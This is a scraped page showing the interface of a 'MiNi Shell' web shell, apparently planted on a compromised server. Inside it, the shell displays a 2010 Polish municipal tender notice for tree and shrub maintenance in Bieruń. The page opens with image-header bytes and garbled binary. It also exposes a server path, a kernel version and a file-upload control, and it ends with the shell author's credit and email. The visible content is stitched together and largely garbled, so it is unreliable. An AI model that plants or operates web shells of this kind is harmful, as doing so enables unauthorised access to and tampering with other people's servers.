JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/10617-N-2010.html

<p class="kh_header"><b>Bieruń: UTRZYMANIE ZIELENI W GMINIE BIERUŃ

ZADANIE 1: DRZEWA I KRZEWY</b><br>
<b>Numer ogłoszenia: 10617 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE ZIELENI W GMINIE BIERUŃ

ZADANIE 1: DRZEWA I KRZEWY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 77340000-5 Usługi okrzesywania drzew oraz przycinania żywopłotów, 
77211400-6 Usługi wycinania drzew.

Przedmiotem zamówienia jest utrzymanie zieleni w Gminie Bieruń w zakresie:
1.	Pielęgnacji drzew, obejmującej następujące rodzaje prac:
a) Wycinka (pozostawiony pień nie większy niż 10 cm od powierzchni gruntu),
b)	Cięcia sanitarne, prześwietleniowe (w zakresie 20 % korony drzewa),
c)	Redukcja korony o 50 % (ogłowienie),
d)	Formowanie korony w kulę,
e)	Frezowanie pni,
f)	Usuwanie powalonych drzew - wiatrołomów (pozostawiony pień nie większy niż 10 cm od powierzchni gruntu),
2.	Pielęgnacji krzewów, obejmującej następujące rodzaje prac :
a)	Odmładzanie żywopłotów - poziome ścięcie wieloletnich gałęzi na wysokość żądaną przez  
             Zamawiającego (z wycinką samosiewów do gruntu, wyrwaniem wrastającej trawy
              i usunięciem wszelkich odpadów); 
b)	 Przycinanie żywopłotów - poziome i pionowe ścięcie jedno i dwuletnich gałęzi (z wycinką 
     samosiewów, wyrwaniem wrastającej trawy i usunięciem wszelkich odpadów);
W/w prace zostaną każdorazowo, telefonicznie zlecane przez inspektora Wydziału Gospodarki 
     Komunalnej. Powstałe przy realizacji zamówienia odpady zagospodarowuje Wykonawca.
     Uzupełnienie opisu przedmiotu zamówienia znajduje się w załącznikach nr 3, 5 do SIWZ. 
     Zamawiający nie przewiduje zawarcia umowy ramowej, aukcji elektronicznej, udzielenia 
     zamówień uzupełniających  w rozumieniu ustawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.34.00.00-5, 77.21.14.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Zasady wnoszenia wadium:
Wadium w wysokości 1 200,00 zł ( słownie:  tysiąc dwieście złotych ) musi być 
wniesione w terminie, który został podany w punkcie -Terminy . 
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  
       kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)    w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy 
       z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109  poz.1158 z późniejszymi zmianami).
Wadium wnoszone w pieniądzu  należy przelać na rachunek Zamawiającego 
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją: 
Wadium - nr sprawy: ZP- 3410 /4/10 Utrzymanie zieleni w gminie Bieruń - Drzewa i  krzewy . Wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium na rachunku Zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 12:00  w dniu otwarcia ofert.W przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się o udzielenie nin. zamówienia, w dokumentach wadialnych należy wskazać nazwę zadania oraz wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib. 
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie   z art. 24 ust.2 pkt 4 ustawy, a jego oferta zostanie odrzucona.

2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy wraz                  z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
Zgodnie z art. 46 ustawy, Zamawiający zwraca wadium :
     a) wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub   
         unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako 
         najkorzystniejsza, z zastrzeżeniem ust. 4a;
b) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po zawarciu umowy oraz 
     wniesieniu zabezpieczenia należytego umowy, jeżeli jego wniesienia żądano;
c) Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte 
         lub upłynął termin do ich wnoszenia;
     d) na wniosek  Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.   
3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Zgodnie z art. 46 ust. 5 ustawy Zmawiający zatrzymuje wadium wraz z odsetkami, jeżeli  Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych     w ofercie;
2)  nie wniósł zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn    
    leżących   po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub  czynności, jeżeli 
      przepisy prawa nakładają obowiązek ich posiadania.
            Ocena spełnienia warunku  będzie dokonana wg zasady: spełnia/ nie spełnia ,na 
podstawie przedłożonego przez Wykonawcę oświadczenia .
2. Posiadają wiedzę i doświadczenie tzn. :
a)  Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania    
     ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie   usługi 
     dotyczące pielęgnacji drzew i krzewów o łącznej wartości minimum  75 000,00 zł brutto.
     Ocena spełnienia warunku  będzie dokonana podstawie  przedłożonych w ofercie 
     oświadczeń i  dokumentów  - wykazu wykonanych w/w usług, a w przypadku 
     świadczeń okresowych lub ciągłych  również  wykonywanych  oraz dokumentu 
     potwierdzającego, że usługi zostały wykonane lub są  wykonywane należycie,   
     w związku z w/w wymaganiami. 
    Zamawiający nie uzna dla spełnienia w/w warunku innych usług dot. pielęgnacji zieleni 
    np.  obsady  kwiatowej,   pielęgnacji trawników.  
    3. Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania 
        zamówienia tzn.:
      a) Dysponują osobą będąca sprawować nadzór nad kontrolą jakości realizacji zamówienia, 
          która posiada  świadectwo ukończenia kursu -Inspektor nadzoru prac w zieleni na 
          terenach  zurbanizowanych.
    Ocena spełnienia warunku  będzie dokonana wg zasady: spełnia/ nie spełnia ,na 
     podstawie przedłożonego przez Wykonawcę oświadczenia i  dokumentu -  wykazu 
     osób, które będą uczestniczyć  w wykonywaniu zamówienia, w związku z w/w 
     wymaganiami . 
       b) Dysponują min. 1 osobą, która będzie bezpośrednio wykonywać zamówienie w zakresie 
           cięcia  sanitarnego, redukcji i formowania korony posiadającą  ukończony kurs 
          -Gospodarz  terenów zieleni - chirurgia drzew ozdobnych.

     Ocena spełnienia warunku  będzie dokonana wg zasady: spełnia/ nie spełnia ,na 
     podstawie przedłożonych w ofercie oświadczeń i dokumentu -  wykazu osób, 
     które będą uczestniczyć  w wykonywaniu zamówienia, w związku z w/w wymaganiami . 
  4.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.:
       a) Ubezpieczeni są od odpowiedzialności cywilnej od prowadzonej działalności związanej
            z przedmiotem zamówienia na sumę minimum 50 000,00 zł.     
            Ocena spełnienia warunku  będzie dokonana wg zasady: spełnia/ nie spełnia ,na 
            podstawie przedłożonych w ofercie oświadczeń i dokumentu -  opłaconej 
            polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest 
            ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
            związanej z przedmiotem zamówienia,  w związku z w/w wymaganiami . 

5.    Nie podlegają wykluczeniu na podstawie art. 24 ust. 1  Prawa zamówień publicznych.
       Ocena spełnienia warunku  będzie dokonana wg zasady: spełnia/ nie spełnia ,na 
       podstawie przedłożonego przez Wykonawcę oświadczenia  .

6. Spełnią wymagania wynikające z oświadczeń, których listę przedstawiono w pkt. -   
    Lista wymaganych oświadczeń    oraz inne wymagania formalne wymagane ustawą 
    Prawo zamówień publicznych oraz  SIWZ ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Lista wymaganych oświadczeń

Każdy Wykonawca przystępujący do postępowania złoży następujące oświadczenia :
1.	Oświadczenie  z  art. 22  ust. 1 ustawy, że :
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada wiedzę i doświadczenie potrzebną do wykonania zamówienia; 
3)	dysponuje  odpowiednim potencjałem  technicznym oraz  osobami zdolnymi do wykonania zamówienia ;
4)  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
     zamówienia;
        2.   Oświadczenie, że nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia 
              publicznego na podstawie art. 24 ust.1 oraz art. 24 ust.2 pkt.1 Prawa zamówień 
              publicznych.
3.  Oświadczenie, że po zapoznaniu się z  SIWZ - akceptuje ją bez zastrzeżeń.
4.  Oświadczenie, że będzie związany przedmiotową ofertą przez okres 30 dni od daty upływu 
      terminu składania ofert, a w przypadku wygrania przetargu podpiszę umowę wg wzoru 
      dołączonego do SIWZ w ciągu 10 dni od daty otrzymania informacji o wyborze oferty.
5.   Oferta jest jawna w całości / części. Strony oferty od -  do ,    stanowią tajemnicę     
      przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą 
      być  ujawnione innym uczestnikom postępowania.
6.  Oświadczenie w jakim zakresie polega na wiedzy i doświadczeniu, potencjale 
     technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych 
     własnych ,a w jakim zakresie   polega na wiedzy i doświadczeniu, potencjale technicznym, 
     osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych 
     podmiotów.
7.  W przypadku oświadczenia Wykonawcy o  poleganiu na wiedzy i doświadczeniu, 
     potencjale technicznym,  osobach zdolnych do wykonania zamówienia lub zdolnościach 
     finansowych innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, Wykonawca  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, a szczególności przedstawić w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

8. Oświadczenie podmiotów występujących wspólnie (konsorcjum, spółka cywilna) -                 
    w przypadku ich  udziału w postępowaniu.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnioną (uprawnione) do zaciągania zobowiązań w imieniu Wykonawcy, zgodnie z wpisem do właściwych rejestrów (KRS) czy ewidencji działalności gospodarczej, lub odpowiednimi pełnomocnictwami w formie oryginału lub notarialnie poświadczonej kopii.

2.Lista wymaganych dokumentów

Od Wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów  z dnia 30 grudnia 2009 roku  (Dz. U. Nr  226/2009 poz. 1817 ) mogą być przedstawione w formie oryginału albo kserokopii poświadczonych za zgodność z oryginałem (zaleca się potwierdzenie każdej zapisanej strony dokumentu) przez Wykonawcę tzn. osobę (osoby) uprawnioną(e) do podpisania oferty:
     
1. Wykaz  wykonanych  usług wskazanych w pkt. IV.2a SIWZ , a w przypadku świadczeń 
    okresowych lub ciągłych  również   wykonywanych dla pełnienia w/w warunku.
 2.  Dokumenty np. referencje zamawiających potwierdzające, że wymienione w wykazie usługi 
      niezbędne do spełnienia warunku uczestnictwa w postępowaniu, zostały wykonane lub są 
      wykonane należycie.       
3.  Wykaz osób, które będą uczestniczyć  w wykonywaniu zamówienia, w związku z wymaganiami 
      wskazanymi w pkt. IV.3 a i b SIWZ.
4.   Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest 
       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w związku 
       z wymaganiami określonymi w pky. IV.4a SIWZ.

Uwaga:
1)  Jeżeli w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczpospolitej Polskiej, osoby, o których mowa w art. 24 ust.1 pkt 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej , Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące niekaralności tych osób w zakresie określonym w art.24 ust.1 pkt. 5-8 ustawy, wystawione nie wcześniej niz 6 m-cy przed upływem terminu składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.

2)  Dokumenty sporządzone w języku obcym są składanie wraz z tłumaczeniem na język polski.

3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów , o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.


4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów , niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

5) Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 43-150 Bieruń, ul. Rynek 14 (Referat Zamówień Publicznych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 12:00, miejsce: Urząd Miejski 43-150 Bieruń ul. Rynek 14 ( kancelaria - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com